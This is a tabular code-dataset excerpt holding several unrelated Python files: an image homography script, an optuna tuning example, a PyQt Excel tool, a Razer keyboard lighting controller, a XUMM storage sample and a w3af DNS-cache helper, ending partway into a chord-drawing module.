hexsha stringlengths 40 40 | size int64 5 2.06M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 3 248 | max_stars_repo_name stringlengths 5 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 248 | max_issues_repo_name stringlengths 5 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 248 | max_forks_repo_name stringlengths 5 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 5 2.06M | avg_line_length float64 1 1.02M | max_line_length int64 3 1.03M | alphanum_fraction float64 0 1 | count_classes int64 0 1.6M | score_classes float64 0 1 | count_generators int64 0 651k | score_generators float64 0 1 | count_decorators int64 0 990k | score_decorators float64 0 1 | count_async_functions int64 0 235k | score_async_functions float64 0 1 | count_documentation int64 0 1.04M | score_documentation float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
804b9dcfe64b7676e4cb3e82339b0395f8d54822 | 2,309 | py | Python | homography-transformation-points.py | Tomikrys/RePhoto | ae0710c68efd91edff5a54f159d8452ea43f5a19 | [
"BSD-3-Clause"
] | null | null | null | homography-transformation-points.py | Tomikrys/RePhoto | ae0710c68efd91edff5a54f159d8452ea43f5a19 | [
"BSD-3-Clause"
] | null | null | null | homography-transformation-points.py | Tomikrys/RePhoto | ae0710c68efd91edff5a54f159d8452ea43f5a19 | [
"BSD-3-Clause"
] | null | null | null | import numpy as np
import cv2
import sys
import json
import os
# Warp the "new" photo (argv[2]) onto the perspective of the "old" photo
# (argv[1]) using a homography computed from manually matched points
# (argv[4], JSON with "old"/"new" point lists); result written to argv[3].
if len(sys.argv) != 5:
    # argv[0] is the script name, so four real arguments are required
    # (the original message claimed "2 arguments required", which was wrong).
    print('4 arguments required: <old image> <new image> <output image> <points json>')
    exit()

img1 = cv2.imread(sys.argv[1])
img2 = cv2.imread(sys.argv[2])

# Read the matched point pairs; the context manager closes the file again
# (the original leaked the open file handle).
with open(sys.argv[4], "r") as points_file:
    points = json.loads(points_file.read())

# findHomography expects (N, 1, 2) float32 arrays.
dst_pts = np.float32(points['old']).reshape(-1, 1, 2)
src_pts = np.float32(points['new']).reshape(-1, 1, 2)
print(src_pts)
print(dst_pts)

h1, w1, c = img1.shape
h2, w2, c = img2.shape
out_img_h = h1
out_img_w = w1

# Scale the dst points to the resolution of the image we will be warping,
# so the output keeps the larger image's resolution.
if h1 < h2 and w1 < w2:
    for i in range(len(dst_pts)):
        dst_pts[i][0][0] = dst_pts[i][0][0] * (float(w2) / w1)
        dst_pts[i][0][1] = dst_pts[i][0][1] * (float(h2) / h1)
    out_img_h = h2
    out_img_w = w2

# RANSAC with a 5px reprojection threshold rejects badly clicked points.
M, mask = cv2.findHomography(src_pts, dst_pts, cv2.RANSAC, 5.0)
print(M)

im_out = cv2.warpPerspective(img2, M, (out_img_w, out_img_h))
if not os.path.exists(os.path.dirname(sys.argv[3])):
    os.mkdir(os.path.dirname(sys.argv[3]))
cv2.imwrite(sys.argv[3], im_out)
print('true')
# cv2.imwrite(sys.argv[3].jpg, img3) | 27.819277 | 88 | 0.607189 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,232 | 0.533564 |
804b9f804c6f3973c7e0b57683f0dc138f768005 | 1,634 | py | Python | cpp/opt.py | AtsushiSakai/optuna_sample | 06282ea35e8fcd2a4b0ffafb8080f56ffbf3ff66 | [
"MIT"
] | 1 | 2019-02-06T09:43:04.000Z | 2019-02-06T09:43:04.000Z | cpp/opt.py | AtsushiSakai/optuna_sample | 06282ea35e8fcd2a4b0ffafb8080f56ffbf3ff66 | [
"MIT"
] | null | null | null | cpp/opt.py | AtsushiSakai/optuna_sample | 06282ea35e8fcd2a4b0ffafb8080f56ffbf3ff66 | [
"MIT"
] | null | null | null | """
Parameter optimization with optuna for Cpp code
author: Atsushi Sakai
"""
import optuna
import numpy as np
import matplotlib.pyplot as plt
import subprocess
def HimmelblauFunction(x, y):
    """
    Himmelblau's function, a classic multi-modal optimization benchmark.

    see Himmelblau's function - Wikipedia, the free encyclopedia
    http://en.wikipedia.org/wiki/Himmelblau%27s_function
    """
    term_a = (x ** 2 + y - 11) ** 2
    term_b = (x + y ** 2 - 7) ** 2
    return term_a + term_b
def objective(trial):
    """Optuna objective: sample (x, y) and evaluate the external C++ binary.

    The compiled ``a.out`` prints the function value on stdout.
    """
    x = trial.suggest_uniform('x', -5, 5)
    y = trial.suggest_uniform('y', -5, 5)
    cmd = "./a.out " + str(x) + " " + str(y)
    output = subprocess.check_output(cmd.split())
    return float(output)
def CreateMeshData():
    """Build a mesh grid of Himmelblau function values for contour plotting."""
    lower, upper, step = -5.0, 5.0, 0.1
    xs = np.arange(lower, upper, step)
    ys = np.arange(lower, upper, step)
    grid_x, grid_y = np.meshgrid(xs, ys)
    # zip iterates row-wise; HimmelblauFunction works element-wise on the
    # numpy row arrays, so grid_z is a list of value rows.
    grid_z = [HimmelblauFunction(row_x, row_y) for (row_x, row_y) in zip(grid_x, grid_y)]
    return (grid_x, grid_y, grid_z)
def main():
    """Optimize the Himmelblau function with optuna and plot the result."""
    print("start!!")

    # contour lines of the Himmelblau function as background
    mesh_x, mesh_y, mesh_z = CreateMeshData()
    plt.contour(mesh_x, mesh_y, mesh_z, 50)

    # run the optimization (storage= can point at MySQL for persistence)
    study = optuna.create_study(
        study_name="julia_himmelblau_function_opt",
        # storage="mysql://root@localhost/optuna"
    )
    study.optimize(objective, n_trials=100, n_jobs=1)

    print(len(study.trials))
    print(study.best_params)

    # mark the best parameters found on top of the contour plot
    plt.plot(study.best_params["x"], study.best_params["y"], "xr")
    plt.show()
    print("done!!")


if __name__ == '__main__':
    main()
| 21.786667 | 66 | 0.618115 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 569 | 0.348225 |
804bc1d2b19b9534b855e8e39ec3bfa6a9bb4dd1 | 5,385 | py | Python | gui/select_excel.py | Tac213/ECConverter | d66d35f7e4ac2802f83ab4e595764c7f8004d317 | [
"MIT"
] | 1 | 2021-08-17T04:46:16.000Z | 2021-08-17T04:46:16.000Z | gui/select_excel.py | Tac213/ECConverter | d66d35f7e4ac2802f83ab4e595764c7f8004d317 | [
"MIT"
] | null | null | null | gui/select_excel.py | Tac213/ECConverter | d66d35f7e4ac2802f83ab4e595764c7f8004d317 | [
"MIT"
] | 1 | 2021-08-17T04:46:18.000Z | 2021-08-17T04:46:18.000Z | # -*- coding: utf-8 -*-
# author: Tac
# contact: gzzhanghuaxiong@corp.netease.com
import os.path
from PyQt6.QtWidgets import QFrame, QVBoxLayout, QPushButton, QSizePolicy, QFileDialog, QMessageBox
from PyQt6.QtCore import Qt, QDir, QModelIndex
from gui.excel_list_view import ExcelListView
from gui.model.excel_list_model import ExcelListModel
import settings
import ec_converter
class SelectExcel(QFrame):
    """
    Window for choosing the Excel files to export.
    """

    def __init__(self, parent=None):
        """
        Constructor

        Args:
            parent: parent widget
        """
        super(SelectExcel, self).__init__(parent)
        self.excel_list_view = ExcelListView(self)
        model = ExcelListModel()
        self.excel_list_view.setModel(model)
        self.select_excel_button = QPushButton(self.tr('选择Excel'), self)
        self.select_excel_button.setToolTip(self.tr('选择本次需要导表的Excel文件,加到Excel列表中'))
        self.select_excel_button.clicked.connect(self._on_select_excel)
        self.convert_button = QPushButton(self.tr('导表'), self)
        self.convert_button.setToolTip(self.tr('对Excel列表中的所有Excel文件执行导表程序'))
        self.convert_button.clicked.connect(self._on_convert)
        self.gen_info_button = QPushButton(self.tr('生成项目Excel信息'), self)
        self.gen_info_button.setToolTip(self.tr('生成%s和%s') % (os.path.basename(settings.EXCEL_INFO_FILENAME),
                                                             os.path.basename(settings.REF_FILENAME)))
        self.gen_info_button.clicked.connect(self._on_gen_info)
        self._excel_dir = QDir(settings.EXCEL_DIR)
        self._init_layout()

    def _init_layout(self):
        """
        Initialize the widget layout.

        Returns:
            None
        """
        layout = QVBoxLayout()
        layout.addWidget(self.excel_list_view)
        layout.addWidget(self.select_excel_button)
        layout.addWidget(self.convert_button)
        layout.addWidget(self.gen_info_button)
        layout.setContentsMargins(10, 10, 10, 10)
        layout.setSpacing(10)
        layout.setAlignment(Qt.AlignmentFlag.AlignTop)
        self.setLayout(layout)
        self.setSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Fixed)

    def set_excel_data(self, data):
        """
        Set the data of the Excel files to export.

        Args:
            data: [list] each item is a relative path to an Excel file

        Returns:
            None
        """
        self.excel_list_view.model().deserialize(data)

    def _on_select_excel(self):
        """
        Callback for clicking the "select Excel" button.

        Returns:
            None
        """
        # _ is the filter, unused here
        files, _ = QFileDialog.getOpenFileNames(
            self,
            self.tr('选择需要导表的Excel'),
            self._excel_dir.path(),
            '*.xlsx',
        )
        current_files = self.excel_list_view.model().serialize()
        for file_path in files:
            file_path = self._excel_dir.relativeFilePath(file_path)
            if file_path in current_files:
                continue
            if file_path.startswith('..'):
                ec_converter.logger.warning(self.tr('所选Excel文件必须要在\'%s\'目录内'), self._excel_dir.path())
                continue
            if '/' in file_path:
                ec_converter.logger.warning(self.tr('所选Excel文件不能在\'%s\'目录的子目录内'), self._excel_dir.path())
                continue
            self.excel_list_view.model().add_node(QModelIndex(), file_path)

    def _on_convert(self):
        """
        Callback for clicking the convert button.

        Returns:
            None
        """
        import convert
        current_files = self.excel_list_view.model().serialize()
        files_full_path = []
        for file in current_files:
            full_path = self._excel_dir.absoluteFilePath(file)
            files_full_path.append(full_path)
        if files_full_path:
            try:
                success = convert.convert_data(files_full_path)
                if success:
                    QMessageBox.information(self, self.tr('提示'), self.tr('导表成功'),
                                            QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
                else:
                    QMessageBox.critical(self, self.tr('错误'), self.tr('导表失败,失败原因请参照输出窗口'),
                                         QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
            except Exception:
                stack_str = ec_converter.logger.log_last_except()
                QMessageBox.critical(self, self.tr('导表失败'), stack_str,
                                     QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)

    def _on_gen_info(self):
        """
        Callback for generating the project Excel info files.

        Returns:
            None
        """
        import convert
        try:
            success = convert.generate_excel_info()
            if success:
                QMessageBox.information(self, self.tr('提示'), self.tr('生成成功'),
                                        QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
            else:
                QMessageBox.critical(self, self.tr('错误'), self.tr('生成失败,失败原因请参照输出窗口'),
                                     QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
        except Exception:
            stack_str = ec_converter.logger.log_last_except()
            QMessageBox.critical(self, self.tr('生成失败'), stack_str,
                                 QMessageBox.StandardButton.Ok, QMessageBox.StandardButton.Ok)
| 37.922535 | 109 | 0.594429 | 5,403 | 0.933322 | 0 | 0 | 0 | 0 | 0 | 0 | 1,245 | 0.215063 |
804caf63ac2093aca40cc342a98958d4f3398ae7 | 16,359 | py | Python | i3razer/i3_razer.py | leofah/i3razer | 526db521d99e371b643d6e1a05a29788c239a95a | [
"MIT"
] | 5 | 2020-07-30T20:59:37.000Z | 2021-11-13T02:17:12.000Z | i3razer/i3_razer.py | leofah/i3razer | 526db521d99e371b643d6e1a05a29788c239a95a | [
"MIT"
] | 1 | 2022-03-31T21:38:08.000Z | 2022-03-31T22:37:38.000Z | i3razer/i3_razer.py | leofah/i3razer | 526db521d99e371b643d6e1a05a29788c239a95a | [
"MIT"
] | null | null | null | from logging import getLogger
from openrazer.client import DeviceManager, constants as razer_constants
from i3razer import config_contants as conf
from i3razer.config_parser import ConfigParser
from i3razer.layout import layouts
from i3razer.pyxhook import HookManager
ERR_DAEMON_OFF = -2  # exit code: the openrazer daemon is not running
ERR_NO_KEYBOARD = -3  # exit code: no razer keyboard was found
ERR_CONFIG = -4  # exit code: error in the config file
class I3Razer:
    """
    Lights a Razer keyboard (through openrazer) according to the modes and
    color schemes of a config file, reacting to key presses captured with a
    pyxhook keyboard hook.
    """

    def __init__(self, config_file, layout=None, logger=None):
        """
        config_file: path to the config file
        layout: keyboard Layout to use for lighting the keys. If none is given it is detected automatically
        logger: Logger to use for logging
        """
        if not logger:
            logger = getLogger(__name__)
        self._logger = logger

        # Keyboard settings
        self._serial = ""
        self._keyboard = None
        self._key_layout = {}
        self._key_layout_name = ""  # Only present if layout is set manually

        # Mode/key state. These are instance attributes (the originals were
        # mutable class attributes) so two instances never share state.
        self._listen_to_keys = set()  # the keys which could change the displayed color scheme
        self._current_pressed_keys = set()
        self._current_scheme_name = ""
        self._mode = None
        self._config = None
        self._drawing_scheme = set()  # prevent infinite inherit loop in color schemes

        # Thread handling
        self._hook = None
        self._running = False

        self._load_config(config_file)
        self._load_keyboard(layout)

    def _update_color_scheme(self):
        """
        Determines which color scheme should be displayed and displays it
        """
        if self._running:
            if not self._mode:
                self._mode = self._config.get_mode_by_name(conf.mode_default)
                self._listen_to_keys = self._config.get_important_keys_mode(self._mode)
            self._logger.debug(f"pressed keys: {self._current_pressed_keys} in mode {self._mode[conf.field_name]}")
            # find mode
            next_mode = self._config.get_next_mode(self._current_pressed_keys, self._mode)
            if next_mode[conf.field_name] != self._mode[conf.field_name]:
                # swapped to a new mode
                self._mode = next_mode
                self._listen_to_keys = self._config.get_important_keys_mode(self._mode)
            # update color scheme for mode
            scheme = self._config.get_color_scheme(self._current_pressed_keys, self._mode)
            self._draw_color_scheme(scheme)

    def _draw_color_scheme(self, color_config):
        """
        Draw the given color scheme (skips redrawing the current scheme).
        """
        if self._current_scheme_name == color_config[conf.field_name]:
            return
        # parse type: anything that is not explicitly a non-static type is
        # drawn as a static scheme
        if conf.field_type in color_config:
            if color_config[conf.field_type] == conf.type_static:
                self._draw_static_scheme(color_config)
            else:
                self._draw_color_effect(color_config)
        else:
            self._draw_static_scheme(color_config)
        self._current_scheme_name = color_config[conf.field_name]
        self._logger.info(f"Drawn color scheme '{color_config[conf.field_name]}'")

    def _draw_color_effect(self, color_config):
        """
        Draw an effect color scheme (breath, reactive, ripple, ...).
        """
        if conf.field_type not in color_config:
            return
        effect_type = color_config[conf.field_type]
        fx = self._keyboard.fx

        # find colors for the effect: either a single 'color' key, or the
        # numbered 'color1'..'color3' keys
        color1, color2, color3 = None, None, None
        nr_colors = 0
        if conf.type_color in color_config:
            color1 = self._config.get_color(color_config[conf.type_color])
            nr_colors = 1
        elif conf.type_color1 in color_config:
            color1 = self._config.get_color(color_config[conf.type_color1])
            nr_colors = 1
            if conf.type_color2 in color_config:
                color2 = self._config.get_color(color_config[conf.type_color2])
                nr_colors = 2
                if conf.type_color3 in color_config:
                    color3 = self._config.get_color(color_config[conf.type_color3])
                    nr_colors = 3

        # huge switch through all modes -----------------------------------------------------------------
        # breath: fall back to fewer colors if the hardware lacks the variant
        if effect_type == conf.type_breath:
            if nr_colors >= 3 and fx.has("breath_triple"):
                fx.breath_triple(color1[0], color1[1], color1[2], color2[0], color2[1], color2[2], color3[0], color3[1],
                                 color3[2])
            elif nr_colors >= 2 and fx.has("breath_dual"):
                fx.breath_dual(color1[0], color1[1], color1[2], color2[0], color2[1], color2[2])
            elif nr_colors >= 1 and fx.has("breath_single"):
                fx.breath_single(color1[0], color1[1], color1[2])
            elif nr_colors >= 0:
                fx.breath_random()
        # reactive
        elif effect_type == conf.type_reactive:
            if not fx.has("reactive"):
                self._logger.warning(f"reactive not supported by keyboard {self._keyboard.name}")
                return
            if not color1:
                self._logger.warning(f"No color for reactive set in {color_config[conf.field_name]}")
                return
            time = conf.time_r_default
            if conf.type_option_time in color_config:
                time = color_config[conf.type_option_time]
            razer_time = razer_constants.REACTIVE_500MS if time == conf.time_500 \
                else razer_constants.REACTIVE_1000MS if time == conf.time_1000 \
                else razer_constants.REACTIVE_1500MS if time == conf.time_1500 \
                else razer_constants.REACTIVE_2000MS if time == conf.time_2000 \
                else None
            fx.reactive(color1[0], color1[1], color1[2], razer_time)
        # ripple
        elif effect_type == conf.type_ripple:
            if not fx.has("ripple"):
                self._logger.warning(f"ripple not supported by keyboard {self._keyboard.name}")
                return
            if color1:
                fx.ripple(color1[0], color1[1], color1[2], razer_constants.RIPPLE_REFRESH_RATE)
            else:
                fx.ripple_random(razer_constants.RIPPLE_REFRESH_RATE)
        # spectrum
        elif effect_type == conf.type_spectrum:
            if not fx.has("spectrum"):
                self._logger.warning(f"spectrum not supported by keyboard {self._keyboard.name}")
                return
            fx.spectrum()
        # starlight
        elif effect_type == conf.type_starlight:
            time = conf.time_s_default
            if conf.type_option_time in color_config:
                time = color_config[conf.type_option_time]
            razer_time = razer_constants.STARLIGHT_FAST if time == conf.time_fast \
                else razer_constants.STARLIGHT_NORMAL if time == conf.time_normal \
                else razer_constants.STARLIGHT_SLOW if time == conf.time_slow \
                else None
            if nr_colors >= 2 and fx.has("starlight_dual"):
                fx.starlight_dual(color1[0], color1[1], color1[2], color2[0], color2[1], color2[2], razer_time)
            elif nr_colors >= 1 and fx.has("starlight_single"):
                fx.starlight_single(color1[0], color1[1], color1[2], razer_time)
            elif nr_colors >= 0:
                fx.starlight_random(razer_time)
        # wave right
        elif effect_type == conf.type_wave_right:
            fx.wave(razer_constants.WAVE_RIGHT)
        # wave left
        elif effect_type == conf.type_wave_left:
            fx.wave(razer_constants.WAVE_LEFT)
        else:
            self._logger.warning(f"type '{effect_type}' is not known")
        # switch finished

    def _draw_static_scheme(self, color_config):
        """
        Draw a static color scheme via the advanced per-key matrix.
        """
        # One could save the result matrix to be faster on a following draw
        self._keyboard.fx.advanced.matrix.reset()
        self._add_to_static_scheme(color_config)
        self._keyboard.fx.advanced.draw()

    def _add_to_static_scheme(self, color_config):
        """
        Adds this scheme (and recursively any inherited ones) onto the
        display matrix.
        """
        # assert scheme type is static
        if color_config[conf.field_type] != conf.type_static:
            self._logger.warning(f"trying to inherit a non static color scheme '{color_config[conf.field_name]}")
            return
        # handle infinite loop
        name = color_config[conf.field_name]
        if name in self._drawing_scheme:
            # should be detected on reading config
            self._logger.warning(f"color scheme '{name}' is in an inherit loop with {self._drawing_scheme}")
            return
        self._drawing_scheme.add(name)
        # set colors
        for field in color_config:
            # handle "inherit"
            if field == conf.field_inherit:
                add_scheme = self._config.get_color_scheme_by_name(color_config[conf.field_inherit])
                self._add_to_static_scheme(add_scheme)
                continue
            # non color fields
            if field in conf.no_color_in_scheme:
                continue
            # handle "all"
            if field == conf.all_keys:
                keys = self._key_layout.keys()
            else:
                # field is a key array
                keys = self._config.get_keys(field)
            if keys:
                color = self._config.get_color(color_config[field])
                self._set_color(color, keys)
        self._drawing_scheme.remove(name)

    def _set_color(self, color, keys):
        """Set *color* on every key of *keys* that exists in the layout."""
        for key in keys:
            if key in self._key_layout:
                self._keyboard.fx.advanced.matrix[self._key_layout[key]] = color
            else:
                self._logger.warning(f"Key '{key}' not found in Layout")

    def _load_keyboard(self, layout):
        """
        Load the keyboard on startup; exits the process if none is found.
        """
        self._key_layout_name = layout
        if not self.reload_keyboard():
            self._logger.critical("No Razer Keyboard found")
            exit(ERR_NO_KEYBOARD)

    def _setup_key_hook(self):
        """
        Setup pyxhook to recognize key presses
        """
        def on_key_pressed(event):
            # Key pressed, update scheme if needed
            key = event.Key.lower()  # config is in lower case
            if key not in self._current_pressed_keys:
                self._current_pressed_keys.add(key)
                if key in self._listen_to_keys:
                    self._update_color_scheme()

        def on_key_released(event):
            key = event.Key.lower()
            if key in self._current_pressed_keys:
                self._current_pressed_keys.remove(key)
            else:
                self._logger.warning(
                    f"releasing key {key} not in pressed keys {self._current_pressed_keys}, resetting pressed keys")
                self._current_pressed_keys = set()
            if key in self._listen_to_keys:
                self._update_color_scheme()

        # init hook manager
        hook = HookManager()
        hook.KeyDown = on_key_pressed
        hook.KeyUp = on_key_released
        self._hook = hook

    def _load_config(self, config_file):
        """
        Load config on startup; exits the process on a broken config.
        """
        self._config = ConfigParser(config_file, self._logger)
        if not self._config.is_integral():
            self._logger.critical("Error while loading config file")
            exit(ERR_CONFIG)

    ###############################################
    # public methods to change or query the state #
    ###############################################

    def start(self):
        """
        Start the shortcut visualisation. This starts a new Thread.
        Stop this by calling stop() on the object.
        """
        if not self._running:
            self._logger.warning("Starting Hook")
            self._setup_key_hook()
            self._hook.start()
            self._running = True
            self._update_color_scheme()

    def stop(self):
        """
        stops the program by stopping the internal thread waiting for keyboard events
        """
        if self._running:
            self._logger.warning(f"Stopping hook")
            self._running = False
            self._hook.cancel()
            self._hook = None

    def reload_config(self, config_file=None) -> bool:
        """
        Loads a new config file and updates color_scheme accordingly
        return: False if error in config
        """
        if not self._config.read(config_file):
            self._logger.error(f"Error in config, using old config file")
            return False
        self.force_update_color_scheme()
        return True

    def reload_keyboard(self, layout=None) -> bool:
        """
        Reloads to the computer connected keyboards, and could set an layout
        return: true if a razer keyboard was loaded
        """
        device_manager = DeviceManager()
        for device in device_manager.devices:
            if device.type == "keyboard":
                self._keyboard = device
                break
        if self._keyboard:
            if layout:
                self._key_layout_name = layout
            device_manager.sync_effects = False
            self._serial = str(self._keyboard.serial)
            self.load_layout(self._key_layout_name)
        else:
            self._logger.error("no razer keyboard found")
            return False
        self._logger.info(f"successfully loaded Keyboard {self._keyboard.name}")
        return True

    def load_layout(self, layout_name=None) -> bool:
        """
        Loads the named layout for the current keyboard. If none is named, the layout is detected automatically
        returns False if the layout cannot be found, the layout is not changed
        """
        # Keysyms have a new map if layout changed
        if self._hook:
            self._hook.reset_keysyms()
        no_layout = False  # flow control
        if not layout_name:
            no_layout = True
            if self._keyboard:
                layout_name = self._keyboard.keyboard_layout
                self._logger.info(f"Detected Layout {layout_name}")
        if layout_name not in layouts and no_layout:
            self._logger.error(f"Layout {layout_name} not found, using default 'en_US'")
            layout_name = "en_US"  # en_US is default and in layout.py
        if layout_name in layouts:
            # Load the layout
            self._key_layout = layouts[layout_name]
            self._logger.info(f"Loaded keyboard layout {layout_name}")
            return True
        # bug fix: the original fell off the end (returning None) for an
        # unknown manually named layout; return False as documented
        return False

    def change_mode(self, mode_name: str) -> bool:
        """
        changes the current mode to the given one and updates the scheme
        return: False if mode does not exist in config
        """
        # bug fix: the original wrote `new_mode = _mode = ...`, creating a
        # stray local `_mode` instead of only the intended `new_mode`
        new_mode = self._config.get_mode_by_name(mode_name)
        if new_mode:
            self._mode = new_mode
            self._listen_to_keys = self._config.get_important_keys_mode(self._mode)
            self._update_color_scheme()
            return True
        return False

    def get_mode_name(self) -> str:
        """
        returns the name of the current mode
        """
        if self._mode:
            return self._mode[conf.field_name]
        else:
            # if no mode loaded, return default name
            return conf.mode_default

    def change_color_scheme(self, color_scheme_name: str) -> bool:
        """
        changes the displayed color scheme. On the next keypress, the old associated color scheme is shown again.
        Works also if the thread is not started yet, then the scheme does not change on a keypress
        return: false if the color scheme cannot be found
        """
        color_config = self._config.get_color_scheme_by_name(color_scheme_name)
        if not color_config:
            return False
        self._draw_color_scheme(color_config)
        return True

    def get_color_scheme_name(self) -> str:
        """
        returns the current drawn color scheme
        """
        return self._current_scheme_name

    def force_update_color_scheme(self):
        """
        deletes internal variables and detects which color scheme to show
        """
        self._current_scheme_name = ""
        self._update_color_scheme()
| 38.311475 | 120 | 0.599609 | 15,948 | 0.974876 | 0 | 0 | 0 | 0 | 0 | 0 | 4,357 | 0.266337 |
804d7d8b57791079c4cce17fe9505b784c3b6b5e | 1,471 | py | Python | samples/storage.py | xdvlabs/xumm-sdk-py | c92066a6e9738e402e0ae1627dd21fbc6b3bead1 | [
"MIT"
] | 4 | 2022-01-29T11:22:06.000Z | 2022-03-01T03:36:59.000Z | samples/storage.py | CASL-AE/xumm-py | dbe040f409ffc5f918086a12f190ef289e709d22 | [
"MIT"
] | 4 | 2022-01-14T22:49:02.000Z | 2022-01-18T17:32:21.000Z | samples/storage.py | CASL-AE/xumm-py | dbe040f409ffc5f918086a12f190ef289e709d22 | [
"MIT"
] | 2 | 2022-03-01T03:32:35.000Z | 2022-03-20T17:11:56.000Z | #!/usr/bin/env python
# coding: utf-8
import logging
import asyncio
import xumm
class StorageExample:
    """Demonstrates set/get/delete on the XUMM app storage endpoint."""

    def __init__(self):
        logging.debug('')
        self.sdk = xumm.XummSdk('API_KEY', 'API_SECRET')
        self.logger = logging.getLogger(self.__module__)
        self.logger.setLevel(level=logging.DEBUG)

    async def run(self):
        """Store a JSON value, read it back, then delete it."""
        # store some json value in storage
        self.logger.info("Set storage value")
        set_storage_result = self.sdk.storage.set({'name': 'Wietse', 'age': 32, 'male': True})
        # True
        if not set_storage_result:
            # bug fix: the original logged an undefined name `e` here,
            # which raised a NameError instead of reporting the failure
            self.logger.error("Unable to set to storage: %s" % set_storage_result)
            return

        # GET the storage content
        get_storage_result = self.sdk.storage.get()
        self.logger.info("Current storage value: %s" % get_storage_result.data)
        # { 'name': 'Wietse', 'age': 32, 'male': True }

        self.logger.info("Delete storage value")
        delete_storage_result = self.sdk.storage.delete()
        if not delete_storage_result:
            self.logger.error("Unable to delete the storage: %s" % delete_storage_result)

        get_storage_result_after_delete = self.sdk.storage.get()
        self.logger.info("Current storage value after delete: %s" % get_storage_result_after_delete.data)
        # None
if __name__ == "__main__":
    # asyncio.run creates and tears down the event loop for us; the manual
    # get_event_loop()/run_until_complete pattern is deprecated.
    example = StorageExample()
    asyncio.run(example.run())
| 29.42 | 105 | 0.638341 | 1,230 | 0.836166 | 0 | 0 | 0 | 0 | 989 | 0.672332 | 385 | 0.261727 |
804e64952849f44f6670f2c038c06ff8ef3ff239 | 2,318 | py | Python | packages/w3af/w3af/core/controllers/misc/dns_cache.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | 3 | 2019-04-09T22:59:33.000Z | 2019-06-14T09:23:24.000Z | tools/w3af/w3af/core/controllers/misc/dns_cache.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | tools/w3af/w3af/core/controllers/misc/dns_cache.py | sravani-m/Web-Application-Security-Framework | d9f71538f5cba6fe1d8eabcb26c557565472f6a6 | [
"MIT"
] | null | null | null | """
dns_cache.py
Copyright 2006 Andres Riancho
This file is part of w3af, http://w3af.org/ .
w3af is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation version 2 of the License.
w3af is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with w3af; if not, write to the Free Software
Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
import socket
# pylint: disable=E0401
from darts.lib.utils.lru import SynchronizedLRUDict
# pylint: enable=E0401
import w3af.core.controllers.output_manager as om
def enable_dns_cache():
    """
    DNS cache trick

    This will speed up all the test! Before this dns cache voodoo magic every
    request to the HTTP server required a DNS query, this is slow on some
    networks so I added this feature.

    This method was taken from:
    # $Id: download.py,v 1.30 2004/05/13 09:55:30 torh Exp $
    That is part of :
    swup-0.0.20040519/

    Developed by:
    # Copyright 2001 - 2003 Trustix AS - <http://www.trustix.com>
    # Copyright 2003 - 2004 Tor Hveem - <tor@bash.no>
    # Copyright 2004 Omar Kilani for tinysofa - <http://www.tinysofa.org>
    """
    om.out.debug('Enabling _dns_cache()')

    if hasattr(socket, 'already_configured'):
        # Already patched. Installing the wrapper a second time would make
        # socket._getaddrinfo point at the caching wrapper itself.
        return

    socket._getaddrinfo = socket.getaddrinfo

    _dns_cache = SynchronizedLRUDict(200)

    def _caching_getaddrinfo(*args, **kwargs):
        # bug fix: the cache key must include kwargs too; calls differing
        # only in keyword arguments must not share one cached answer
        query = (args, tuple(sorted(kwargs.items())))
        try:
            res = _dns_cache[query]
            # This was too noisy and not so useful
            # om.out.debug('Cached DNS response for domain: ' + args[0])
            return res
        except KeyError:
            res = socket._getaddrinfo(*args, **kwargs)
            _dns_cache[query] = res

            msg = 'DNS response from DNS server for domain: %s'
            om.out.debug(msg % args[0])
            return res

    socket.getaddrinfo = _caching_getaddrinfo
    socket.already_configured = True
| 31.324324 | 77 | 0.684211 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,534 | 0.661777 |
80524ca8ae4e4f10430fd0ea3cbd3e1253bc5c64 | 3,875 | py | Python | fretboard/chord.py | honorabel/python-fretboard | fb6a37e29bf6a19bee11940e9b42d58220c1306c | [
"MIT"
] | 69 | 2016-11-18T02:11:01.000Z | 2022-03-26T12:54:55.000Z | fretboard/chord.py | honorabel/python-fretboard | fb6a37e29bf6a19bee11940e9b42d58220c1306c | [
"MIT"
] | 3 | 2018-05-24T15:08:46.000Z | 2020-09-19T21:49:36.000Z | fretboard/chord.py | honorabel/python-fretboard | fb6a37e29bf6a19bee11940e9b42d58220c1306c | [
"MIT"
] | 16 | 2018-06-12T10:34:26.000Z | 2021-01-09T15:21:55.000Z | import copy
import attrdict
import svgwrite
